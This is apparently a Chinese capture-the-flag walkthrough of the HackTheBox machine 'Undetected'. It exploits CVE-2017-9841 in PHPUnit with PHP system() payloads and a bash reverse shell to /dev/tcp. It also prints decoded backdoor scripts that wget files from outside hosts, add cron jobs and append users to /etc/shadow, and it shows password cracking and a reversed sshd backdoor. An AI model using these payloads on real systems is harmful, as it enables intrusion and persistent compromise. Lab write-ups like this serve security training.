Hackthebox - Undetected

靶场信息

靶场类型

信息搜集

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.146
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-24 21:25 EST
Nmap scan report for 10.10.11.146
Host is up (0.23s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey: 
|   3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
|   256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
|_  256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=42918%PV=Y%DS=2%DC=T%G=Y%TM=62183E4
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=C)SEQ
OS:(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(TI=Z%CI=Z%II=I%TS=A)OPS(O1=M505
OS:ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=
OS:M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=
OS:Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q
OS:=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL
OS:=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   222.46 ms 10.10.14.1
2   222.61 ms 10.10.11.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.48 seconds

nmap扫描后只看到22和80,那就去看看80端口吧

Http

这看着像是一家珠宝店的官网,先在网站上到处看看有没有啥可以利用的东西吧

点击STORE会跳转到store.djewelry.htb,加入hosts再看看

echo 10.10.11.146 djewelry.htb store.djewelry.htb >> /etc/hosts

进来以后是一个商城页面,到处看看功能点

这里提示网站已搬迁,去做个FUZZ看看

Fuzz

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://store.djewelry.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://store.djewelry.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

js                      [Status: 301, Size: 321, Words: 20, Lines: 10]
images                  [Status: 301, Size: 325, Words: 20, Lines: 10]
css                     [Status: 301, Size: 322, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 324, Words: 20, Lines: 10]
vendor                  [Status: 301, Size: 325, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 283, Words: 20, Lines: 10]
                        [Status: 200, Size: 6215, Words: 528, Lines: 196]
:: Progress: [20116/20116] :: Job [1/1] :: 106 req/sec :: Duration: [0:03:03] :: Errors: 0 ::

挨个查看一下

在vendor里有不少东西,有点意思

/vendor/phpunit/phpunit/

在这个路径中可以看到版本更新记录,最后一个版本是5.6,查看一下ChangeLog-5.6.md

# Changes in PHPUnit 5.6

All notable changes of the PHPUnit 5.6 release series are documented in this file using the [Keep a CHANGELOG](http://keepachangelog.com/) principles.

## [5.6.2] - 2016-10-25

New PHAR release due to updated dependencies

## [5.6.1] - 2016-10-07

### Fixed

* Fixed [#2320](https://github.com/sebastianbergmann/phpunit/issues/2320): Conflict between `PHPUnit_Framework_TestCase::getDataSet()` and `PHPUnit_Extensions_Database_TestCase::getDataSet()`

## [5.6.0] - 2016-10-07

### Added

* Merged [#2240](https://github.com/sebastianbergmann/phpunit/pull/2240): Provide access to a test case's data set (for use in `setUp()`, for instance)
* Merged [#2262](https://github.com/sebastianbergmann/phpunit/pull/2262): Add the `PHPUnit_Framework_Constraint_DirectoryExists`, `PHPUnit_Framework_Constraint_IsReadable`, and `PHPUnit_Framework_Constraint_IsWritable` constraints as well as the `assertIsReadable()`, `assertNotIsReadable()`, `assertIsWritable()`, `assertNotIsWritable()`, `assertDirectoryExists()`, `assertDirectoryNotExists()`, `assertDirectoryIsReadable()`, `assertDirectoryNotIsReadable()`, `assertDirectoryIsWritable()`, `assertDirectoryNotIsWritable()`, `assertFileIsReadable()`, `assertFileNotIsReadable()`, `assertFileIsWritable()`, and `assertFileNotIsWritable()` assertions
* Added `PHPUnit\Framework\TestCase::createConfiguredMock()` based on [idea](https://twitter.com/kriswallsmith/status/763550169090625536) by Kris Wallsmith
* Added the `@doesNotPerformAssertions` annotation for excluding a test from the "useless test" risky test check

### Changed

* Deprecated `PHPUnit\Framework\TestCase::setExpectedExceptionRegExp()`
* `PHPUnit_Util_Printer` no longer optionally cleans up HTML output using `ext/tidy`

[5.6.2]: https://github.com/sebastianbergmann/phpunit/compare/5.6.1...5.6.2
[5.6.1]: https://github.com/sebastianbergmann/phpunit/compare/5.6.0...5.6.1
[5.6.0]: https://github.com/sebastianbergmann/phpunit/compare/5.5...5.6.0

这边给出了一个更新时间,最后一次是在2016-10-25,那咱们看看PHPUnit在这个时间之后的漏洞就可以了

这边搜索后可以看到有一个CVE-2017-9841是符合我们的条件的

漏洞利用

Exploit

http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

https://www.cvedetails.com/cve/CVE-2017-9841/

https://github.com/vulhub/vulhub/blob/master/phpunit/CVE-2017-9841/README.zh-cn.md

根据上面对该漏洞的描述,在vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php处进行利用,咱们抓个包进行一次尝试

在下方加入然后放包执行

成功被执行了

现在咱们来想办法构造一下命令

GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: store.djewelry.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 24

<?php system("whoami")?>

成功执行命令,但是有点麻烦,用curl看看能不能成功吧

┌──(root💀kali)-[~/Desktop]
└─# curl http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php --data "<?php system('whoami')?>"
www-data

OK,成功执行命令,那么现在来构造poc回弹shell吧

Shell

使用nc监听一个端口

nc -nvlp 4444
<?php system('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.24/4444 0>&1"')?>

在burp里执行即可获得shell

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.11.146] 56644
bash: cannot set terminal process group (865): Inappropriate ioctl for device
bash: no job control in this shell
www-data@production:/var/www/store/vendor/phpunit/phpunit/src/Util/PHP$ python3 -c "import pty;pty.spawn('/bin/bash')";
<HP$ python3 -c "import pty;pty.spawn('/bin/bash')";                    
www-data@production:/var/www/store/vendor/phpunit/phpunit/src/Util/PHP$ whoami&&id
<ore/vendor/phpunit/phpunit/src/Util/PHP$ whoami&&id                    
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功拿到一个shell

Ctrl+Z返回
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237

修复一下shell

权限提升

User

www-data@production:/var/www/store/vendor/phpunit/phpunit/src/Util/PHP$ grep 'bash' /etc/passwd
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash

咱们的提权目标就在steven和steven1这两个用户上了

www-data@production:/var/www/store/vendor/phpunit/phpunit/src/Util/PHP$ cd /home
www-data@production:/home$ ls
steven
www-data@production:/home$ cd steven
bash: cd: steven: Permission denied
www-data@production:/home$ ls -la
total 12
drwxr-xr-x  3 root   root   4096 Feb  8 19:59 .
drwxr-xr-x 19 root   root   4096 Feb  8 19:59 ..
drwxr-x---  5 steven steven 4096 Feb  8 19:59 steven

没有权限进入steven用户目录,这里暂时没有思路了,跑一个Linpeas看看

linpeas跑出来的结果比较多,就不全贴出来了,其中看到一个

/var/backups/info存在一个这个文件,并且还是www-data权限的,去看看

www-data@production:/var/backups$ ls -la
total 72
drwxr-xr-x  2 root     root      4096 Feb 24 23:49 .
drwxr-xr-x 13 root     root      4096 Feb  8 19:59 ..
-rw-r--r--  1 root     root     34011 Feb  8 19:05 apt.extended_states.0
-r-x------  1 www-data www-data 27296 May 14  2021 info
www-data@production:/var/backups$ file info 
info: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0dc004db7476356e9ed477835e583c68f1d2493a, for GNU/Linux 3.2.0, not stripped

这是一个二进制文件,查看一下

776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f6420373535202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b

在一大堆乱码中找到了这么一串十六进制字符

┌──(root💀kali)-[~/Desktop]
└─# echo "776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f6420373535202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b" | xxd -r -p
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;

我们将它转为ASCII格式

提取出这么一串hash,然后稍微修改一下

$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/

然后再读取中知道了这一串应该是setven1的密码,去使用john爆破一下试试

┌──(root💀kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihatehackers     (?)
1g 0:00:00:55 DONE (2022-02-25 01:39) 0.01789g/s 1594p/s 1594c/s 1594C/s jojo95..halo03
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到了setven1的密码

username = steven1
password = ihatehackers

使用ssh进行连接

┌──(root💀kali)-[~/Desktop]
└─# ssh steven1@10.10.11.146
steven1@10.10.11.146's password: 
steven@production:~$ whoami&&id
steven
uid=1000(steven) gid=1000(steven) groups=1000(steven)

成功获得user权限

steven@production:~$ ls
user.txt
steven@production:~$ cat user.txt 
e27e4aba73ab8ba7421550905082163e

成功获得user权限的flag文件

Root

sudo -l提示失败,那就跑个linpeas.sh看看情况吧

[+] Mails (limit 50)
    17793      4 -rw-rw----   1 steven   mail          966 Jul 25  2021 /var/mail/steven                                                                                                                            
    17793      4 -rw-rw----   1 steven   mail          966 Jul 25  2021 /var/spool/mail/steven

看到两个关于邮件的信息,查看一下

steven@production:~$ cat /var/mail/steven
From root@production  Sun, 25 Jul 2021 10:31:12 GMT
Return-Path: <root@production>
Received: from production (localhost [127.0.0.1])
        by production (8.15.2/8.15.2/Debian-18) with ESMTP id 80FAcdZ171847
        for <steven@production>; Sun, 25 Jul 2021 10:31:12 GMT
Received: (from root@localhost)
        by production (8.15.2/8.15.2/Submit) id 80FAcdZ171847;
        Sun, 25 Jul 2021 10:31:12 GMT
Date: Sun, 25 Jul 2021 10:31:12 GMT
Message-Id: <202107251031.80FAcdZ171847@production>
To: steven@production
From: root@production
Subject: Investigations

Hi Steven.

We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.

Thanks,
sysadmin

这里大概意思是说最近更新了一下系统,但是在apache上有点奇怪的问题,所以暂时把商城和数据库搬迁到另一台服务器上了,正在排查原因,如果我们需要访问的话可以联系Mark,他会给我们一个临时密码的

这里我猜测应该是做邮件伪造了

不过我们还是先去看看apache服务吧

apache服务目录位于/usr/lib

steven@production:~$ ls -la /usr/lib/apache2/
total 28
drwxr-xr-x  3 root root  4096 Jul  5  2021 .
drwxr-xr-x 82 root root  4096 Feb  8 19:59 ..
drwxr-xr-x  2 root root 20480 Jan 28 21:05 modules

我们对这个目录有读取和执行权限,还不错,去看看

steven@production:/usr/lib/apache2/modules$ ls -la
total 8796
drwxr-xr-x 2 root root   20480 Jan 28 21:05 .
drwxr-xr-x 3 root root    4096 Jul  5  2021 ..
-rw-r--r-- 1 root root   15925 Jan  5 14:49 httpd.exp
-rw-r--r-- 1 root root 4625776 Nov 25 23:16 libphp7.4.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_access_compat.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_actions.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_alias.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_allowmethods.so
-rw-r--r-- 1 root root   14464 Jan  5 14:49 mod_asis.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_auth_basic.so
-rw-r--r-- 1 root root   39120 Jan  5 14:49 mod_auth_digest.so
-rw-r--r-- 1 root root   35024 Jan  5 14:49 mod_auth_form.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authn_anon.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authn_core.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authn_dbd.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authn_dbm.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authn_file.so
-rw-r--r-- 1 root root   22768 Jan  5 14:49 mod_authn_socache.so
-rw-r--r-- 1 root root   35024 Jan  5 14:49 mod_authnz_fcgi.so
-rw-r--r-- 1 root root   55528 Jan  5 14:49 mod_authnz_ldap.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_authz_core.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authz_dbd.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authz_dbm.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authz_groupfile.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authz_host.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authz_owner.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_authz_user.so
-rw-r--r-- 1 root root   43216 Jan  5 14:49 mod_autoindex.so
-rw-r--r-- 1 root root   22736 Jan  5 14:49 mod_brotli.so
-rw-r--r-- 1 root root   14464 Jan  5 14:49 mod_bucketeer.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_buffer.so
-rw-r--r-- 1 root root   80176 Jan  5 14:49 mod_cache.so
-rw-r--r-- 1 root root   39120 Jan  5 14:49 mod_cache_disk.so
-rw-r--r-- 1 root root   39152 Jan  5 14:49 mod_cache_socache.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_case_filter.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_case_filter_in.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_cern_meta.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_cgi.so
-rw-r--r-- 1 root root   43216 Jan  5 14:49 mod_cgid.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_charset_lite.so
-rw-r--r-- 1 root root   14464 Jan  5 14:49 mod_data.so
-rw-r--r-- 1 root root  104656 Jan  5 14:49 mod_dav.so
-rw-r--r-- 1 root root   59600 Jan  5 14:49 mod_dav_fs.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_dav_lock.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_dbd.so
-rw-r--r-- 1 root root   39120 Jan  5 14:49 mod_deflate.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_dialup.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_dir.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_dumpio.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_echo.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_env.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_expires.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_ext_filter.so
-rw-r--r-- 1 root root   14592 Jan  5 14:49 mod_file_cache.so
-rw-r--r-- 1 root root   22736 Jan  5 14:49 mod_filter.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_headers.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_heartbeat.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_heartmonitor.so
-rw-r--r-- 1 root root  253632 Jan  5 14:49 mod_http2.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_ident.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_imagemap.so
-rw-r--r-- 1 root root   55504 Jan  5 14:49 mod_include.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_info.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_lbmethod_bybusyness.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_lbmethod_byrequests.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_lbmethod_bytraffic.so
-rw-r--r-- 1 root root   22736 Jan  5 14:49 mod_lbmethod_heartbeat.so
-rw-r--r-- 1 root root   84176 Jan  5 14:49 mod_ldap.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_log_debug.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_log_forensic.so
-rw-r--r-- 1 root root  134544 Jan  5 14:49 mod_lua.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_macro.so
-rw-r--r-- 1 root root  260672 Jan  5 14:49 mod_md.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_mime.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_mime_magic.so
-rw-r--r-- 1 root root   67792 Jan  5 14:49 mod_mpm_event.so
-rw-r--r-- 1 root root   39120 Jan  5 14:49 mod_mpm_prefork.so
-rw-r--r-- 1 root root   47312 Jan  5 14:49 mod_mpm_worker.so
-rw-r--r-- 1 root root   39120 Jan  5 14:49 mod_negotiation.so
-rw-r--r-- 1 root root  133888 Jan  5 14:49 mod_proxy.so
-rw-r--r-- 1 root root   55504 Jan  5 14:49 mod_proxy_ajp.so
-rw-r--r-- 1 root root   59600 Jan  5 14:49 mod_proxy_balancer.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_proxy_connect.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_proxy_express.so
-rw-r--r-- 1 root root   35024 Jan  5 14:49 mod_proxy_fcgi.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_proxy_fdpass.so
-rw-r--r-- 1 root root   47312 Jan  5 14:49 mod_proxy_ftp.so
-rw-r--r-- 1 root root   35024 Jan  5 14:49 mod_proxy_hcheck.so
-rw-r--r-- 1 root root   39152 Jan  5 14:49 mod_proxy_html.so
-rw-r--r-- 1 root root   47312 Jan  5 14:49 mod_proxy_http.so
-rw-r--r-- 1 root root   67936 Jan  5 14:49 mod_proxy_http2.so
-rw-r--r-- 1 root root   22768 Jan  5 14:49 mod_proxy_scgi.so
-rw-r--r-- 1 root root   22656 Jan  5 14:49 mod_proxy_uwsgi.so
-rw-r--r-- 1 root root   18560 Jan  5 14:49 mod_proxy_wstunnel.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_ratelimit.so
-rw-r--r-- 1 root root   34800 May 17  2021 mod_reader.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_reflector.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_remoteip.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_reqtimeout.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_request.so
-rw-r--r-- 1 root root   75984 Jan  5 14:49 mod_rewrite.so
-rw-r--r-- 1 root root   43216 Jan  5 14:49 mod_sed.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_session.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_session_cookie.so
-rw-r--r-- 1 root root   30928 Jan  5 14:49 mod_session_crypto.so
-rw-r--r-- 1 root root   22736 Jan  5 14:49 mod_session_dbd.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_setenvif.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_slotmem_plain.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_slotmem_shm.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_socache_dbm.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_socache_memcache.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_socache_redis.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_socache_shmcb.so
-rw-r--r-- 1 root root   18640 Jan  5 14:49 mod_speling.so
-rw-r--r-- 1 root root  248240 Jan  5 14:49 mod_ssl.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_status.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_substitute.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_suexec.so
-rw-r--r-- 1 root root   14464 Jan  5 14:49 mod_unique_id.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_userdir.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_usertrack.so
-rw-r--r-- 1 root root   14544 Jan  5 14:49 mod_vhost_alias.so
-rw-r--r-- 1 root root   26832 Jan  5 14:49 mod_xml2enc.so

文件有点多啊,那么稍微筛选一下,按照最近修改来排序

steven@production:/usr/lib/apache2/modules$ ls --full-time -i | sort -u
 2050 -rw-r--r-- 1 root root   34800 2021-05-17 07:10:04.000000000 +0000 mod_reader.so

就是这个文件了,我们把它下载下来看看

scp steven1@10.10.11.146:/usr/lib/apache2/modules/mod_reader.so ~/Desktop

下载下来后,在mod_reader.so中提取到一段base64码

d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk

给解析一下

┌──(root💀kali)-[~/Desktop]
└─# echo -n 'd2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk' | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd

这边是把这张图片传输到sshd,去下载下来

使用ghidra打开进行逆向

从这里可以看出来,我们的密码是31位

backdoor._28_2_ = 0xa9f4;
backdoor._24_4_ = 0xbcf0b5e3;
backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
backdoor[30] = -0x5b;
backdoor._0_4_ = 0xf0e7abd6;
backdoor._4_4_ = 0xa4b3a3f3;
backdoor._8_4_ = 0xf7bbfdc8;
backdoor._12_4_ = 0xfdb3d6e7;

我们给它排序一下,从高到低排序

backdoor[30] = -0x5b;
backdoor._28_2_ = 0xa9f4;
backdoor._24_4_ = 0xbcf0b5e3;
backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
backdoor._12_4_ = 0xfdb3d6e7;
backdoor._8_4_ = 0xf7bbfdc8;
backdoor._4_4_ = 0xa4b3a3f3;
backdoor._0_4_ = 0xf0e7abd6;
0x5b
0xa9f4
0xbcf0b5e3
0xb2d6f4a0fda0b3d6
0xfdb3d6e7
0xf7bbfdc8
0xa4b3a3f3
0xf0e7abd6

这边排序好以后,右键查看一下0x5b

发现正确的应该是0xa5,修改一下后去做一下编码

首先转化成HEX再转化为XOR

https://gchq.github.io/CyberChef/#recipe=Swap_endianness(‘Hex’,31,true)From_Hex(‘Auto’)XOR({‘option’:’Hex’,’string’:’96’},’Standard’,false)&input=MHhhNQoweGE5ZjQKMHhiY2YwYjVlMwoweGIyZDZmNGEwZmRhMGIzZDYKMHhmZGIzZDZlNwoweGY3YmJmZGM4CjB4YTRiM2EzZjMKMHhmMGU3YWJkNg

这是最终改出来的效果,点开即可看到我的结果

0xa5
0xa9f4
0xbcf0b5e3
0xb2d6f4a0fda0b3d6
0xfdb3d6e7
0xf7bbfdc8
0xa4b3a3f3
0xf0e7abd6
@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3

得到了backdoor的密码

┌──(root💀kali)-[~/Desktop]
└─# ssh root@10.10.11.146                                   
The authenticity of host '10.10.11.146 (10.10.11.146)' can't be established.
